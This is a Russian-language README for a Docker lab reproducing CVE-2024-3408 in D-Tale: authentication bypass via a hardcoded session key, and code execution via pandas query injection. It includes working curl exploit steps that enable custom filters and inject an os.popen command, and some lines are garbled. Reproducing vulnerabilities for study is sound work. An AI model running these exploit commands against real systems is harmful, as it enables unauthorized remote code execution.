
Лаборатория уязвимостей для CVE-2024-3408 - обход аутентификации и RCE в D-Tale
Воспроизводимая лабораторная среда для CVE-2024-3408, уязвимости обхода аутентификации и удаленного выполнения кода в D-Tale.
Версии D-Tale до 3.15.1 уязвимы из-за:
"Dtale") для подписи сессий Flask – позволяет подделать cookie сессииtest-filter использует pandas query, который может быть использован для выполнения произвольного Python-кодаCVSS: 9.8 (Критический)
Затронутые версии: D-Tale <= 3.15.1
docker compose up -d --build
D-Tale будет доступен по адресу http://localhost:40000
# Шаг 1: Включение пользовательских фильтров
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Ожидаемый результат: {"success":true}
# Шаг 2: Выполнение команды через инъекцию в pandas query
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
--data-urlencode "[email protected].__import__('os').popen('id').read()"
# Ожидаемый результат: Ответ содержит "uid=" и "gid=" (вывод команды в сообщении об ошибке)
docker compose down
Данная лабораторная среда предназначена только для образовательных целей и авторизованного тестирования безопасности. Не используйте её против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.